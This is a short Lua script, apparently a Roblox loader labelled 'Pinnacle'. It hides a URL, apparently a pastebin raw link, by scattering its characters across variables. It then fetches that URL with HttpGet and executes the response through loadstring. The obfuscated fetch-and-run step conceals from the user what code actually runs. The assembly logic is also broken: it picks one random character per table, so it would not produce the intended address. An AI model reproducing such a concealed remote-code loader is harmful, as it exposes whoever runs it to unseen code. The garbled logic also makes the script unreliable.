print("Loading Pinnacle...")
local a1, b1, c1, d1, e1, f1, g1, h1 = 'h', 't', 'p', 's', 'e', 'b', 'i', 'n'
local a2, b2, c2, d2, e2 = 'c', 'o', 'm', '/', 'r'
local a3, b3, c3, d3, e3, f3 = 'a', 'w', '4', 'U', 'C', 'b'
local a4, b4, c4, d4, e4 = 'W', 'k', 'W', 'k', '4'
local f = {a1, b1, c1, d1, e1, f1, g1, h1}
local s = {a2, b2, c2, d2, e2}
local t = {a3, b3, c3, d3, e3, f3}
local u = {a4, b4, c4, d4, e4}
local function s1(t) return t[math.random(1, #t)] end
local function p1() return s1(f) end
local function p2() return s1(s) end
local function p3() return s1(t) end
local function p4() return s1(u) end
local p5 = function() return p1()..p2()..p3()..p4() end
local p6 = p5()
local function q1() return game:HttpGet(p6) end
local function q2() return loadstring(q1())() end
q2()
